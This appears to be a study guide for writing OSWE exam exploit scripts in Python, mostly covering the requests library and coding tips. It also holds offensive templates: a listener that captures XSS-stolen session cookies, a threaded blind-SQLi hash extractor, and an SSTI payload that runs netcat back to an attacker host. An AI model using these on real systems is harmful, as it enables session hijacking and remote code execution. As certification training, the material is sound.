Exploit Writing for OSWE

Background

What

This repository contains a list of useful snippets and tips that pertain to the writing of exploit scripts in the OSWE labs and certification exam.

Some examples here may go against certain coding practices, but our end goal is to write the exploit script quickly and correctly.

The Code Snippets section is a great place to start if you are not experienced in using the requests library or are new to Python. Otherwise, feel free to skip to the Reusable Code section or the Tips section.

Why

  • While there are many write-ups, reviews, and notes on the certification, few resources specifically focus on the process of writing exploits.
  • Writing the exploit script can be daunting, especially for those who are new to Python or have little experience interacting with web applications through code.
  • Time spent on identifying vulnerabilities and documenting an exam report can fluctuate considerably, but the time spent on developing the exploit script can be minimized and kept constant if mastered well.

Code Snippets

Starting Template

import requests

def main():
    print("Hello World!")

if __name__ == "__main__":
    main()

Useful imports

# For sending HTTP requests
import requests

# For Base64 encoding/decoding
from base64 import b64encode, b64decode, urlsafe_b64encode, urlsafe_b64decode

# For getting current time or for calculating time delays
from time import time

# For regular expressions
import re

# For running shell commands
import subprocess

# For multithreading
from concurrent.futures import ThreadPoolExecutor

# For running an HTTP server in the background
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler

# For parsing HTTP cookies
from http import cookies

# For getting command-line arguments
import sys

Using the requests library

Sending the simplest HTTP request

resp_obj = requests.get("https://github.com")

Specifying different HTTP methods

# GET method
requests.get("https://github.com")

# POST method
requests.post("https://github.com")

# PUT method
requests.put("https://github.com")

# PATCH method
requests.patch("https://github.com")

# DELETE method
requests.delete("https://github.com")

Reading the HTTP response

resp_obj = requests.get("https://github.com")

# HTTP status code (e.g. 404, 500, 301)
resp_obj.status_code

# HTTP response headers (e.g. Location, Content-Disposition)
resp_obj.headers["Location"]

# Body as bytes
resp_obj.content

# Body as a string
resp_obj.text

# Body as a dictionary (if the body is JSON)
resp_obj.json()

Sending data as a query string in the URL (Using params argument)

params = {
    "foo": "bar"
}

requests.get("https://github.com", params=params)

Sending data as a query string in the body (Using data argument)

data = {
    "foo": "bar"
}

requests.post("https://github.com", data=data)

Sending data as a JSON in the body (Using json argument)

data = {
    "foo": "bar"
}

requests.post("https://github.com", json=data)

Sending a file in the body (Using files argument)

files = {
    #                (FILE_NAME, FILE_CONTENTS, FILE_MIMETYPE)
    "uploaded_file": ("phpinfo.php", b"<?php phpinfo() ?>", "application/x-httpd-php")
}

requests.post("https://github.com", files=files)

Setting HTTP headers (Using headers argument)

headers = {
    "X-Forwarded-For": "127.0.0.1"
}

requests.get("https://github.com", headers=headers)

Setting HTTP cookies (Using cookies argument)

cookies = {
    "PHPSESSID": "fakesession"
}

requests.get("https://github.com", cookies=cookies)

Disabling following of 3XX redirects (Using allow_redirects argument)

requests.post("https://github.com/login", allow_redirects=False)

Interacting with an unverified HTTPS server (Using verify argument)

# Suppresses InsecureRequestWarning messages
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

requests.get("https://github.com", verify=False)

Sending a request through an HTTP proxy (Using proxies argument)

proxies = {
    # Keys are lowercase URL schemes; uppercase keys would not match
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

requests.get("https://github.com", proxies=proxies)

Creating a Session

session = requests.Session()
session.get("https://github.com")

Setting persistent cookies

session = requests.Session()
session.cookies.update({"PHPSESSID": "fakesession"})

Setting persistent headers

session = requests.Session()
session.headers["Authorization"] = "Basic 123"

Troubleshooting

Use Wireshark and filter for HTTP requests

  1. Open Wireshark
  2. Select the VPN interface (e.g. tun0).
  3. Enter http into the filter bar.

Print contents of the HTTP request

data = {
    "foo": "bar"
}
resp_obj = requests.post("https://github.com", data=data)
prepared_request = resp_obj.request

print("Method:\n", prepared_request.method)
print()
print("URL:\n", prepared_request.url)
print()
print("Headers:\n", prepared_request.headers)
print()
print("Body:\n", prepared_request.body)

Proxy HTTP request through Burp Suite and inspect

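  1. Open Burp Suite.
  2. Navigate to the "Proxy" tab and set "Intercept" to "On".
  3. Run the script with the proxies argument (or the HTTP_PROXY / HTTPS_PROXY environment variables) pointing at the Burp listener, e.g. http://127.0.0.1:8080.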

Reusable code

Serving files via HTTP

LHOST      = "10.0.0.1"
WEB_PORT   = 8000
JS_PAYLOAD = "<script>alert(1)</script>"

def start_web_server():
    class MyHandler(BaseHTTPRequestHandler):
        # Uncomment this method to suppress HTTP logs
        # def log_message(self, format, *args):
        #     return

        def do_GET(self):
            if self.path.endswith('/payload.js'):
                self.send_response(200)
                self.send_header("Content-Type", "application/javascript")
                # Content-Length counts bytes, so measure the encoded payload
                self.send_header("Content-Length", str(len(JS_PAYLOAD.encode())))
                self.end_headers()
                self.wfile.write(JS_PAYLOAD.encode())
            
    httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
    threading.Thread(target=httpd.serve_forever).start()

start_web_server()

Stealing HTTP cookies

LHOST      = "10.0.0.1"
WEB_PORT   = 8000

session = requests.Session()
xss_event = threading.Event() # Signifies when victim sends their cookie

def send_xss_payload():
    pass

def start_web_server():
    class MyHandler(BaseHTTPRequestHandler):

        def do_GET(self):
            self.send_response(200)
            self.end_headers()

            # Load stolen cookie into session
            _, enc_cookie = self.path.split("/?cookie=", 1)
            plain_cookie = urlsafe_b64decode(enc_cookie).decode()
            # SimpleCookie items are Morsel objects; .value gives the cookie string
            session.cookies["PHPSESSID"] = cookies.SimpleCookie(plain_cookie)["PHPSESSID"].value

            xss_event.set() # Trigger the event
            
    httpd = HTTPServer((LHOST, WEB_PORT), MyHandler)
    threading.Thread(target=httpd.serve_forever).start()

start_web_server()
send_xss_payload()
xss_event.wait() # Wait for event to be triggered
print("[+] Stolen cookie:", session.cookies["PHPSESSID"])
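The cookie-parsing step inside do_GET can be tested on its own before wiring it into the server. Below is a minimal sketch, assuming the victim's browser sends document.cookie as URL-safe Base64 in a cookie query parameter (as in the handler above). The helper name extract_cookie is hypothetical and not part of the original snippet.

```python
from base64 import urlsafe_b64decode, urlsafe_b64encode
from http import cookies
from urllib.parse import urlsplit, parse_qs

def extract_cookie(path, name="PHPSESSID"):
    """Return the value of cookie `name` from a path like /?cookie=<urlsafe base64>."""
    query = parse_qs(urlsplit(path).query)
    enc_cookie = query["cookie"][0]
    # Restore Base64 padding in case the payload stripped the trailing '='
    enc_cookie += "=" * (-len(enc_cookie) % 4)
    plain_cookie = urlsafe_b64decode(enc_cookie).decode()
    # Parse a "k1=v1; k2=v2" string, the same shape as document.cookie
    jar = cookies.SimpleCookie()
    jar.load(plain_cookie)
    return jar[name].value

# Simulate what the victim's browser would send
encoded = urlsafe_b64encode(b"PHPSESSID=abc123; theme=dark").decode()
print(extract_cookie("/?cookie=" + encoded))
```

Using parse_qs instead of splitting on "/?cookie=" is a design choice here: it tolerates extra query parameters, at the cost of a slightly longer helper.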

Speeding up SQL injections

MAX_WORKERS = 20
HASH_LENGTH = 32

def exfiltrate_hash():

    def boolean_sqli(arguments):
        idx, ascii_val = arguments
        # ...
        # Perform SQLi and store boolean outcome into truth
        # ...
        return ascii_val, truth

    result = ""

    # Go through each character position
    for idx in range(HASH_LENGTH):

        # Use MAX_WORKERS threads to test possible ASCII values in parallel
        with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
            # Pass each of (idx, 32), (idx, 33), ..., (idx, 126) as an argument to boolean_sqli()
            responses = executor.map(boolean_sqli, [(idx, ascii_val) for ascii_val in range(32, 127)])

        # Go through each response and determine which ASCII value is correct
        for ascii_val, truth in responses:
            if truth:
                result += chr(ascii_val)
                break
    
    return result

hash = exfiltrate_hash()
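To check the threading logic without a live target, the SQLi request can be swapped for a local stand-in. The sketch below is one possible dry run: SECRET and the simulated oracle are assumptions made for illustration, and in a real exploit boolean_sqli() would send the injection and inspect the response instead.

```python
from concurrent.futures import ThreadPoolExecutor

MAX_WORKERS = 20
SECRET = "5f4dcc3b5aa765d61d8327deb882cf99"  # Stand-in for the value stored in the database

def boolean_sqli(arguments):
    idx, ascii_val = arguments
    # Simulated oracle: a real exploit would send the request here
    # and derive truth from the response (status code, body, timing)
    truth = ord(SECRET[idx]) == ascii_val
    return ascii_val, truth

def exfiltrate(length):
    result = ""
    # Reuse one pool for all positions instead of creating one per character
    with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
        for idx in range(length):
            # Printable ASCII: 32 (space) through 126 (~) inclusive
            candidates = [(idx, ascii_val) for ascii_val in range(32, 127)]
            for ascii_val, truth in executor.map(boolean_sqli, candidates):
                if truth:
                    result += chr(ascii_val)
                    break
    return result

print("[+] Recovered:", exfiltrate(len(SECRET)))
```

Once the dry run recovers SECRET, only the body of boolean_sqli() needs to change for the real target.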

Tips

Perform a sanity check after every HTTP request using assert

  • Catch whether a webshell is indeed uploaded before attempting to trigger it
  • Catch whether authentication is successful before exploiting authenticated features

Example:

# Suppose 302 is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data, allow_redirects=False)
assert resp_obj.status_code == 302, "Login not successful"

# Suppose admin page is returned if successful login
resp_obj = requests.post("http://example.com/login", data=data)
assert "Admin Dashboard" in resp_obj.text, "Login not successful"

Print meaningful messages after each step

  • Action being started/finished OR
  • Cookies/tokens/files/values that were retrieved

Example:

[+] Parsed command-line arguments and got:
  * BASE_URL: http://example.com
  * LHOST:    127.0.0.1
  * LPORT:    1337
[+] Triggered password reset token generation
[=] Getting password reset token length...
[+] Got password reset token length: 10
[=] Retrieving password reset token...
[+] Got password reset token: FAKE_TOKEN
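Output like the above can be produced with a tiny helper so the prefixes stay consistent. This is only a sketch; the function name status and its done parameter are hypothetical.

```python
def status(message, done=True):
    """Print a progress line: [+] for a finished step, [=] for one in progress."""
    line = ("[+] " if done else "[=] ") + message
    print(line)
    return line

status("Getting password reset token length...", done=False)
status("Got password reset token length: 10")
```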

Separate each exploitation step into its own function

Example:

def register():
    pass

def login():
    pass

def rce():
    pass

Create a global Session object so it does not need to be explicitly passed to each function call

session = requests.Session()

def login():
    session.post(...)

def rce():
    session.post(...)

Create a global BASE_URL string and construct the required URLs from it

BASE_URL = ""
session = requests.Session()

def login():
    url = BASE_URL + "/login"
    session.post(url, ...)

def rce():
    url = BASE_URL + "/rce"
    session.post(url, ...)

def main():
    # Allow BASE_URL to be modified
    global BASE_URL
    BASE_URL = sys.argv[1]
...
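Plain string concatenation produces a double slash if BASE_URL is passed with a trailing slash. The following is a minimal sketch of one way to normalize it while parsing arguments; the argument layout (base_url, lhost, lport) and the helper names are assumptions, loosely matching the values printed in the earlier output example.

```python
import argparse

def parse_args(argv=None):
    # Hypothetical argument layout: poc.py BASE_URL LHOST LPORT
    parser = argparse.ArgumentParser(description="Exploit PoC")
    parser.add_argument("base_url", help="e.g. http://example.com")
    parser.add_argument("lhost")
    parser.add_argument("lport", type=int)
    args = parser.parse_args(argv)
    # Drop trailing slashes so BASE_URL + "/login" never yields "//login"
    args.base_url = args.base_url.rstrip("/")
    return args

def build_url(base_url, path):
    """Join a base URL and a path with exactly one slash between them."""
    return base_url.rstrip("/") + "/" + path.lstrip("/")

args = parse_args(["http://example.com/", "10.0.0.1", "1337"])
print(build_url(args.base_url, "/login"))
```

Passing argv explicitly, as in the last two lines, makes the parser easy to try out without touching the real command line.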

To force all HTTP requests through Burp Suite without using the proxies argument, set the HTTP_PROXY / HTTPS_PROXY environment variables when running the script

$ HTTP_PROXY=http://127.0.0.1:8080 HTTPS_PROXY=http://127.0.0.1:8080 python3 poc.py

Apply encoding/decoding scheme(s) to enable safe transmission of payloads

  • Base64
  • Hexadecimal
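As a quick illustration of both schemes, the sketch below encodes a command containing quotes and shell metacharacters, then decodes it back. The command string is an arbitrary placeholder chosen for this example.

```python
from base64 import b64encode, b64decode

# Placeholder payload with characters that often break in transit
cmd = """echo 'it works' && echo "done" > /tmp/out.txt"""

# Base64: compact, but may contain '+', '/' and '=' (use urlsafe_b64encode in URLs)
b64_payload = b64encode(cmd.encode()).decode()

# Hexadecimal: twice the size, but only [0-9a-f]
hex_payload = cmd.encode().hex()

print("Base64:", b64_payload)
print("Hex:   ", hex_payload)

# Both schemes round-trip to the original string
print(b64decode(b64_payload).decode() == cmd)
print(bytes.fromhex(hex_payload).decode() == cmd)
```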

Use """ to create the payload string if it contains both single (') and double quotes (")

Example:

payload = """This is a '. This is a "."""

Speed up SQL injections using multithreading

See Speeding up SQL injections.

Hardcode an authenticated user's cookie when developing exploits for authenticated features

This is especially useful when obtaining an authenticated session requires many time-consuming steps.

Example:

session = requests.Session()

def main():
    # Skipping these for now...
    # register()
    # login()

    # TODO: Delete this line after you are
    # done developing and uncomment the above steps!
    session.cookies["JSESSIONID"] = "ADMIN_COOKIE"

    # Exploit authenticated features...
...

Avoid using f-strings (f"") or str.format if the payload contains too many curly braces ({})

Doubling each curly brace to escape it is tedious and error-prone. Instead, use simple placeholders and call .replace()!

Example:

# Too many curly braces
ssti_payload = f"{{{{ __import__('os').system('nc {LHOST} {LPORT}') }}}}"
# Much easier to read
ssti_payload = "{{ __import__('os').system('nc <LHOST> <LPORT>') }}"\
    .replace("<LHOST>", LHOST)\
    .replace("<LPORT>", str(LPORT))  # str() in case LPORT is an int